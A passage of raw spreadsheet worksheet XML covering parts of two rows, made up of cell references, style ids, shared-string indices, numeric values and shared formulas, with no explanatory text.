      </c>
      <c r="AQ107" s="100">
        <v>0.0</v>
      </c>
      <c r="AR107" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS107" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT107" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU107" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV107" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW107" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX107" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY107" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ107" s="100">
        <v>0.0</v>
      </c>
      <c r="BA107" s="102">
        <v>0.0</v>
      </c>
      <c r="BB107" s="102">
        <v>0.0</v>
      </c>
      <c r="BC107" s="102">
        <v>0.0</v>
      </c>
      <c r="BD107" s="102">
        <v>0.0</v>
      </c>
      <c r="BE107" s="102">
        <v>0.0</v>
      </c>
      <c r="BF107" s="102">
        <v>0.0</v>
      </c>
      <c r="BG107" s="102">
        <v>0.0</v>
      </c>
      <c r="BH107" s="102">
        <v>0.0</v>
      </c>
      <c r="BI107" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ107" s="102">
        <v>0.0</v>
      </c>
      <c r="BK107" s="102">
        <v>0.0</v>
      </c>
      <c r="BL107" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM107" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN107" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO107" s="103">
        <f t="shared" si="115"/>
        <v>0</v>
      </c>
      <c r="BP107" s="103">
        <f t="shared" si="116"/>
        <v>0</v>
      </c>
      <c r="BQ107" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR107" s="103">
        <f t="shared" si="118"/>
        <v>0</v>
      </c>
      <c r="BS107" s="103">
        <f t="shared" si="119"/>
        <v>0</v>
      </c>
      <c r="BT107" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU107" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV107" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX107" s="104">
        <v>0.0</v>
      </c>
      <c r="BY107" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ107" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB107" s="104">
        <v>0.0</v>
      </c>
      <c r="CC107" s="104">
        <v>0.0</v>
      </c>
      <c r="CD107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CG107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ107" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK107" s="104">
        <v>0.0</v>
      </c>
      <c r="CL107" s="104">
        <v>0.0</v>
      </c>
      <c r="CM107" s="105">
        <v>0.0</v>
      </c>
      <c r="CN107" s="105">
        <v>0.0</v>
      </c>
      <c r="CO107" s="105">
        <v>0.0</v>
      </c>
      <c r="CP107" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ107" s="105">
        <v>0.0</v>
      </c>
      <c r="CR107" s="105">
        <v>0.0</v>
      </c>
      <c r="CS107" s="105">
        <v>0.0</v>
      </c>
      <c r="CT107" s="105">
        <v>0.0</v>
      </c>
      <c r="CU107" s="105">
        <v>0.0</v>
      </c>
      <c r="CV107" s="105">
        <v>0.0</v>
      </c>
      <c r="CW107" s="105">
        <v>0.0</v>
      </c>
      <c r="CX107" s="105">
        <v>0.0</v>
      </c>
      <c r="CY107" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ107" s="105">
        <v>0.0</v>
      </c>
      <c r="DA107" s="105">
        <v>0.0</v>
      </c>
      <c r="DB107" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC107" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD107" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE107" s="106">
        <f t="shared" si="125"/>
        <v>0</v>
      </c>
      <c r="DF107" s="106">
        <f t="shared" si="126"/>
        <v>0</v>
      </c>
      <c r="DG107" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH107" s="106">
        <f t="shared" si="127"/>
        <v>0</v>
      </c>
      <c r="DI107" s="106">
        <f t="shared" si="128"/>
        <v>0</v>
      </c>
      <c r="DJ107" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK107" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL107" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN107" s="108">
        <v>0.0</v>
      </c>
      <c r="DO107" s="108">
        <v>0.0</v>
      </c>
      <c r="DP107" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR107" s="108">
        <v>0.0</v>
      </c>
      <c r="DS107" s="108">
        <v>0.0</v>
      </c>
      <c r="DT107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DW107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ107" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA107" s="108">
        <v>0.0</v>
      </c>
      <c r="EB107" s="108">
        <v>0.0</v>
      </c>
      <c r="EC107" s="109">
        <v>0.0</v>
      </c>
      <c r="ED107" s="109">
        <v>0.0</v>
      </c>
      <c r="EE107" s="109">
        <v>0.0</v>
      </c>
      <c r="EF107" s="109">
        <v>0.0</v>
      </c>
      <c r="EG107" s="109">
        <v>0.0</v>
      </c>
      <c r="EH107" s="109">
        <v>0.0</v>
      </c>
      <c r="EI107" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ107" s="109">
        <v>0.0</v>
      </c>
      <c r="EK107" s="109">
        <v>0.0</v>
      </c>
      <c r="EL107" s="109">
        <v>0.0</v>
      </c>
      <c r="EM107" s="109">
        <v>0.0</v>
      </c>
      <c r="EN107" s="109">
        <v>0.0</v>
      </c>
      <c r="EO107" s="109">
        <v>0.0</v>
      </c>
      <c r="EP107" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ107" s="109">
        <v>0.0</v>
      </c>
      <c r="ER107" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES107" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET107" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU107" s="110">
        <f t="shared" si="133"/>
        <v>0</v>
      </c>
      <c r="EV107" s="110">
        <f t="shared" si="134"/>
        <v>0</v>
      </c>
      <c r="EW107" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX107" s="110">
        <f t="shared" si="136"/>
        <v>0</v>
      </c>
      <c r="EY107" s="110">
        <f t="shared" si="137"/>
        <v>0</v>
      </c>
      <c r="EZ107" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA107" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB107" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FD107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FE107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FF107" s="101" t="s">
        <v>12</v>
      </c>
      <c r="FG107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH107" s="111">
        <v>0.0</v>
      </c>
      <c r="FI107" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL107" s="111" t="str">
        <f t="shared" si="155"/>
        <v>-</v>
      </c>
      <c r="FM107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP107" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ107" s="111">
        <v>0.0</v>
      </c>
      <c r="FR107" s="111">
        <v>0.0</v>
      </c>
      <c r="FS107" s="112">
        <v>0.0</v>
      </c>
      <c r="FT107" s="112">
        <v>0.0</v>
      </c>
      <c r="FU107" s="112">
        <v>0.0</v>
      </c>
      <c r="FV107" s="112">
        <v>0.0</v>
      </c>
      <c r="FW107" s="112">
        <v>0.0</v>
      </c>
      <c r="FX107" s="112">
        <v>0.0</v>
      </c>
      <c r="FY107" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ107" s="112">
        <v>0.0</v>
      </c>
      <c r="GA107" s="112">
        <v>0.0</v>
      </c>
      <c r="GB107" s="112">
        <v>0.0</v>
      </c>
      <c r="GC107" s="112">
        <v>0.0</v>
      </c>
      <c r="GD107" s="112">
        <v>0.0</v>
      </c>
      <c r="GE107" s="112">
        <v>0.0</v>
      </c>
      <c r="GF107" s="112">
        <v>0.0</v>
      </c>
      <c r="GG107" s="112">
        <v>0.0</v>
      </c>
      <c r="GH107" s="113">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="GI107" s="113">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="GJ107" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK107" s="113">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="GL107" s="113">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="GM107" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN107" s="113">
        <f t="shared" si="145"/>
        <v>0</v>
      </c>
      <c r="GO107" s="113">
        <f t="shared" si="146"/>
        <v>0</v>
      </c>
      <c r="GP107" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ107" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR107" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS107" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT107" s="94"/>
      <c r="GU107" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV107" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW107" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF107" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG107" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH107" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI107" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ107" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK107" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL107" s="93">
        <v>0.0</v>
      </c>
      <c r="HM107" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN107" s="93">
        <v>0.0</v>
      </c>
      <c r="HO107" s="93">
        <v>0.0</v>
      </c>
      <c r="HP107" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ107" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR107" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS107" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT107" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU107" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV107" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW107" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX107" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC107" s="120" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="ID107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH107" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II107" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ107" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK107" s="99">
        <v>150.0</v>
      </c>
      <c r="IL107" s="99">
        <v>0.0</v>
      </c>
      <c r="IM107" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN107" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO107" s="98">
        <v>0.0</v>
      </c>
      <c r="IP107" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ107" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR107" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS107" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT107" s="127"/>
      <c r="IU107" s="127"/>
      <c r="IV107" s="127"/>
      <c r="IW107" s="127"/>
      <c r="IX107" s="127"/>
      <c r="IY107" s="127"/>
      <c r="IZ107" s="127"/>
      <c r="JA107" s="127"/>
      <c r="JB107" s="127"/>
      <c r="JC107" s="127"/>
      <c r="JD107" s="127"/>
      <c r="JE107" s="127"/>
      <c r="JF107" s="127"/>
      <c r="JG107" s="127"/>
      <c r="JH107" s="127"/>
      <c r="JI107" s="127"/>
      <c r="JJ107" s="127"/>
      <c r="JK107" s="127"/>
      <c r="JL107" s="127"/>
      <c r="JM107" s="127"/>
      <c r="JN107" s="127"/>
      <c r="JO107" s="127"/>
      <c r="JP107" s="127"/>
      <c r="JQ107" s="127"/>
      <c r="JR107" s="127"/>
      <c r="JS107" s="127"/>
      <c r="JT107" s="127"/>
      <c r="JU107" s="127"/>
      <c r="JV107" s="127"/>
      <c r="JW107" s="127"/>
      <c r="JX107" s="127"/>
      <c r="JY107" s="127"/>
      <c r="JZ107" s="127"/>
      <c r="KA107" s="127"/>
      <c r="KB107" s="127"/>
      <c r="KC107" s="127"/>
      <c r="KD107" s="127"/>
      <c r="KE107" s="127"/>
      <c r="KF107" s="127"/>
      <c r="KG107" s="127"/>
      <c r="KH107" s="127"/>
      <c r="KI107" s="127"/>
      <c r="KJ107" s="127"/>
      <c r="KK107" s="127"/>
      <c r="KL107" s="127"/>
      <c r="KM107" s="127"/>
      <c r="KN107" s="127"/>
      <c r="KO107" s="127"/>
      <c r="KP107" s="127"/>
      <c r="KQ107" s="127"/>
      <c r="KR107" s="127"/>
      <c r="KS107" s="127"/>
      <c r="KT107" s="127"/>
      <c r="KU107" s="127"/>
      <c r="KV107" s="127"/>
      <c r="KW107" s="127"/>
      <c r="KX107" s="127"/>
      <c r="KY107" s="127"/>
      <c r="KZ107" s="127"/>
      <c r="LA107" s="127"/>
      <c r="LB107" s="127"/>
      <c r="LC107" s="127"/>
      <c r="LD107" s="127"/>
      <c r="LE107" s="127"/>
      <c r="LF107" s="127"/>
      <c r="LG107" s="127"/>
      <c r="LH107" s="127"/>
      <c r="LI107" s="127"/>
      <c r="LJ107" s="127"/>
      <c r="LK107" s="127"/>
      <c r="LL107" s="127"/>
      <c r="LM107" s="127"/>
      <c r="LN107" s="127"/>
      <c r="LO107" s="127"/>
      <c r="LP107" s="127"/>
      <c r="LQ107" s="127"/>
      <c r="LR107" s="127"/>
      <c r="LS107" s="127"/>
      <c r="LT107" s="127"/>
      <c r="LU107" s="127"/>
      <c r="LV107" s="127"/>
      <c r="LW107" s="127"/>
      <c r="LX107" s="127"/>
      <c r="LY107" s="127"/>
      <c r="LZ107" s="127"/>
      <c r="MA107" s="127"/>
      <c r="MB107" s="127"/>
      <c r="MC107" s="127"/>
      <c r="MD107" s="127"/>
      <c r="ME107" s="127"/>
      <c r="MF107" s="127"/>
      <c r="MG107" s="127"/>
      <c r="MH107" s="127"/>
      <c r="MI107" s="127"/>
      <c r="MJ107" s="127"/>
      <c r="MK107" s="127"/>
      <c r="ML107" s="127"/>
      <c r="MM107" s="127"/>
      <c r="MN107" s="127"/>
      <c r="MO107" s="127"/>
      <c r="MP107" s="127"/>
      <c r="MQ107" s="127"/>
      <c r="MR107" s="127"/>
      <c r="MS107" s="127"/>
      <c r="MT107" s="127"/>
      <c r="MU107" s="127"/>
      <c r="MV107" s="127"/>
      <c r="MW107" s="127"/>
      <c r="MX107" s="127"/>
      <c r="MY107" s="127"/>
      <c r="MZ107" s="127"/>
      <c r="NA107" s="127"/>
      <c r="NB107" s="127"/>
      <c r="NC107" s="127"/>
      <c r="ND107" s="127"/>
      <c r="NE107" s="127"/>
      <c r="NF107" s="127"/>
      <c r="NG107" s="127"/>
      <c r="NH107" s="127"/>
      <c r="NI107" s="127"/>
      <c r="NJ107" s="127"/>
      <c r="NK107" s="127"/>
      <c r="NL107" s="127"/>
      <c r="NM107" s="127"/>
      <c r="NN107" s="127"/>
      <c r="NO107" s="127"/>
      <c r="NP107" s="127"/>
      <c r="NQ107" s="127"/>
      <c r="NR107" s="127"/>
      <c r="NS107" s="127"/>
      <c r="NT107" s="127"/>
      <c r="NU107" s="127"/>
      <c r="NV107" s="127"/>
      <c r="NW107" s="127"/>
      <c r="NX107" s="127"/>
      <c r="NY107" s="127"/>
    </row>
    <row r="108" ht="153.75" customHeight="1">
      <c r="B108" s="89" t="s">
        <v>357</v>
      </c>
      <c r="C108" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D108" s="90" t="s">
        <v>358</v>
      </c>
      <c r="E108" s="90" t="s">
        <v>1812</v>
      </c>
      <c r="F108" s="90" t="s">
        <v>1813</v>
      </c>
      <c r="G108" s="90" t="s">
        <v>1814</v>
      </c>
      <c r="H108" s="90" t="s">
        <v>1815</v>
      </c>
      <c r="I108" s="92" t="s">
        <v>1816</v>
      </c>
      <c r="J108" s="92" t="s">
        <v>1817</v>
      </c>
      <c r="K108" s="92" t="s">
        <v>1818</v>
      </c>
      <c r="L108" s="93" t="s">
        <v>1141</v>
      </c>
      <c r="M108" s="93">
        <v>113.0</v>
      </c>
      <c r="N108" s="93">
        <v>2.0</v>
      </c>
      <c r="O108" s="93">
        <v>0.0</v>
      </c>
      <c r="P108" s="93">
        <v>2.0</v>
      </c>
      <c r="Q108" s="93">
        <f t="shared" si="160"/>
        <v>2</v>
      </c>
      <c r="R108" s="93">
        <v>2.0</v>
      </c>
      <c r="S108" s="93">
        <v>0.0</v>
      </c>
      <c r="T108" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U108" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V108" s="155" t="s">
        <v>1819</v>
      </c>
      <c r="W108" s="96" t="s">
        <v>1820</v>
      </c>
      <c r="X108" s="132" t="s">
        <v>1821</v>
      </c>
      <c r="Y108" s="126" t="s">
        <v>1822</v>
      </c>
      <c r="Z108" s="132" t="s">
        <v>1823</v>
      </c>
      <c r="AA108" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB108" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC108" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD108" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE108" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF108" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG108" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH108" s="99" t="s">
        <v>1824</v>
      </c>
      <c r="AI108" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ108" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK108" s="100" t="s">
        <v>1825</v>
      </c>
      <c r="AL108" s="100">
        <v>2.0</v>
      </c>
      <c r="AM108" s="100">
        <v>23.0</v>
      </c>
      <c r="AN108" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO108" s="100" t="s">
        <v>1825</v>
      </c>
      <c r="AP108" s="100">
        <v>2.0</v>
      </c>
      <c r="AQ108" s="100">
        <v>23.0</v>
      </c>
      <c r="AR108" s="100" t="s">
        <v>1825</v>
      </c>
      <c r="AS108" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT108" s="100" t="str">
        <f t="shared" si="164"/>
        <v>1917, 1448</v>
      </c>
      <c r="AU108" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV108" s="100" t="s">
        <v>1825</v>
      </c>
      <c r="AW108" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX108" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY108" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ108" s="100">
        <v>0.0</v>
      </c>
      <c r="BA108" s="102">
        <v>112.0</v>
      </c>
      <c r="BB108" s="102">
        <v>18.0</v>
      </c>
      <c r="BC108" s="102">
        <v>23.0</v>
      </c>
      <c r="BD108" s="102">
        <v>23.0</v>
      </c>
      <c r="BE108" s="102">
        <v>0.0</v>
      </c>
      <c r="BF108" s="102">
        <v>0.0</v>
      </c>
      <c r="BG108" s="102">
        <v>0.0</v>
      </c>
      <c r="BH108" s="102">
        <v>0.0</v>
      </c>
      <c r="BI108" s="102">
        <v>18.0</v>
      </c>
      <c r="BJ108" s="102">
        <v>23.0</v>
      </c>
      <c r="BK108" s="102">
        <v>23.0</v>
      </c>
      <c r="BL108" s="103">
        <f t="shared" si="112"/>
        <v>9</v>
      </c>
      <c r="BM108" s="103">
        <f t="shared" si="113"/>
        <v>9</v>
      </c>
      <c r="BN108" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO108" s="103">
        <f t="shared" si="115"/>
        <v>11.5</v>
      </c>
      <c r="BP108" s="103">
        <f t="shared" si="116"/>
        <v>11.5</v>
      </c>
      <c r="BQ108" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR108" s="103">
        <f t="shared" si="118"/>
        <v>11.5</v>
      </c>
      <c r="BS108" s="103">
        <f t="shared" si="119"/>
        <v>11.5</v>
      </c>
      <c r="BT108" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU108" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV108" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW108" s="104" t="s">
        <v>1826</v>
      </c>
      <c r="BX108" s="104">
        <v>4.0</v>
      </c>
      <c r="BY108" s="104">
        <v>41.0</v>
      </c>
      <c r="BZ108" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA108" s="104" t="s">
        <v>1826</v>
      </c>
      <c r="CB108" s="104">
        <v>4.0</v>
      </c>
      <c r="CC108" s="104">
        <v>41.0</v>
      </c>
      <c r="CD108" s="104" t="s">
        <v>1827</v>
      </c>
      <c r="CE108" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF108" s="104" t="str">
        <f t="shared" ref="CF108:CF114" si="165">IF(CD108="-",CE108,CD108)</f>
        <v>1917, 1448, 2001330</v>
      </c>
      <c r="CG108" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH108" s="104" t="s">
        <v>1827</v>
      </c>
      <c r="CI108" s="104">
        <v>2027413.0</v>
      </c>
      <c r="CJ108" s="129" t="s">
        <v>12</v>
      </c>
      <c r="CK108" s="129">
        <v>1.0</v>
      </c>
      <c r="CL108" s="129">
        <v>1.0</v>
      </c>
      <c r="CM108" s="105">
        <v>110.0</v>
      </c>
      <c r="CN108" s="105">
        <v>18.0</v>
      </c>
      <c r="CO108" s="105">
        <v>40.0</v>
      </c>
      <c r="CP108" s="105">
        <v>23.0</v>
      </c>
      <c r="CQ108" s="105">
        <v>18.0</v>
      </c>
      <c r="CR108" s="105">
        <v>40.0</v>
      </c>
      <c r="CS108" s="105">
        <v>1.0</v>
      </c>
      <c r="CT108" s="105">
        <v>0.0</v>
      </c>
      <c r="CU108" s="105">
        <v>1.0</v>
      </c>
      <c r="CV108" s="105">
        <v>1.0</v>
      </c>
      <c r="CW108" s="105">
        <v>18.0</v>
      </c>
      <c r="CX108" s="105">
        <v>40.0</v>
      </c>
      <c r="CY108" s="105">
        <v>23.0</v>
      </c>
      <c r="CZ108" s="105">
        <v>18.0</v>
      </c>
      <c r="DA108" s="105">
        <v>40.0</v>
      </c>
      <c r="DB108" s="106">
        <f t="shared" si="122"/>
        <v>9</v>
      </c>
      <c r="DC108" s="106">
        <f t="shared" si="123"/>
        <v>9</v>
      </c>
      <c r="DD108" s="106">
        <f t="shared" si="124"/>
        <v>0.5</v>
      </c>
      <c r="DE108" s="106">
        <f t="shared" si="125"/>
        <v>20</v>
      </c>
      <c r="DF108" s="106">
        <f t="shared" si="126"/>
        <v>20</v>
      </c>
      <c r="DG108" s="106">
        <f t="shared" si="20"/>
        <v>0.5</v>
      </c>
      <c r="DH108" s="106">
        <f t="shared" si="127"/>
        <v>20</v>
      </c>
      <c r="DI108" s="106">
        <f t="shared" si="128"/>
        <v>20</v>
      </c>
      <c r="DJ108" s="106">
        <f t="shared" si="129"/>
        <v>0.5</v>
      </c>
      <c r="DK108" s="107">
        <f t="shared" si="104"/>
        <v>0.5</v>
      </c>
      <c r="DL108" s="106">
        <f t="shared" si="105"/>
        <v>1</v>
      </c>
      <c r="DM108" s="108" t="s">
        <v>1828</v>
      </c>
      <c r="DN108" s="108">
        <v>10.0</v>
      </c>
      <c r="DO108" s="108">
        <v>47.0</v>
      </c>
      <c r="DP108" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ108" s="108" t="s">
        <v>1828</v>
      </c>
      <c r="DR108" s="108">
        <v>10.0</v>
      </c>
      <c r="DS108" s="108">
        <v>47.0</v>
      </c>
      <c r="DT108" s="108" t="s">
        <v>1829</v>
      </c>
      <c r="DU108" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV108" s="108" t="str">
        <f t="shared" ref="DV108:DV126" si="166">IF(DT108="-",DU108,DT108)</f>
        <v>2001330, 1917, 15935, 1448, 44486, 44484, 44488, 44487, 44485</v>
      </c>
      <c r="DW108" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX108" s="108" t="s">
        <v>1829</v>
      </c>
      <c r="DY108" s="108">
        <v>2027413.0</v>
      </c>
      <c r="DZ108" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA108" s="108">
        <v>1.0</v>
      </c>
      <c r="EB108" s="108">
        <v>1.0</v>
      </c>
      <c r="EC108" s="109">
        <v>112.0</v>
      </c>
      <c r="ED108" s="109">
        <v>20.0</v>
      </c>
      <c r="EE108" s="109">
        <v>43.0</v>
      </c>
      <c r="EF108" s="109">
        <v>29.0</v>
      </c>
      <c r="EG108" s="109">
        <v>18.0</v>
      </c>
      <c r="EH108" s="109">
        <v>46.0</v>
      </c>
      <c r="EI108" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ108" s="109">
        <v>0.0</v>
      </c>
      <c r="EK108" s="109">
        <v>1.0</v>
      </c>
      <c r="EL108" s="109">
        <v>1.0</v>
      </c>
      <c r="EM108" s="109">
        <v>20.0</v>
      </c>
      <c r="EN108" s="109">
        <v>43.0</v>
      </c>
      <c r="EO108" s="109">
        <v>29.0</v>
      </c>
      <c r="EP108" s="109">
        <v>18.0</v>
      </c>
      <c r="EQ108" s="109">
        <v>46.0</v>
      </c>
      <c r="ER108" s="110">
        <f t="shared" si="130"/>
        <v>10</v>
      </c>
      <c r="ES108" s="110">
        <f t="shared" si="131"/>
        <v>10</v>
      </c>
      <c r="ET108" s="110">
        <f t="shared" si="132"/>
        <v>0.5</v>
      </c>
      <c r="EU108" s="110">
        <f t="shared" si="133"/>
        <v>21.5</v>
      </c>
      <c r="EV108" s="110">
        <f t="shared" si="134"/>
        <v>21.5</v>
      </c>
      <c r="EW108" s="110">
        <f t="shared" si="135"/>
        <v>0.5</v>
      </c>
      <c r="EX108" s="110">
        <f t="shared" si="136"/>
        <v>23</v>
      </c>
      <c r="EY108" s="110">
        <f t="shared" si="137"/>
        <v>23</v>
      </c>
      <c r="EZ108" s="110">
        <f t="shared" si="138"/>
        <v>0.5</v>
      </c>
      <c r="FA108" s="110">
        <f t="shared" si="106"/>
        <v>0.5</v>
      </c>
      <c r="FB108" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC108" s="111" t="s">
        <v>1830</v>
      </c>
      <c r="FD108" s="111">
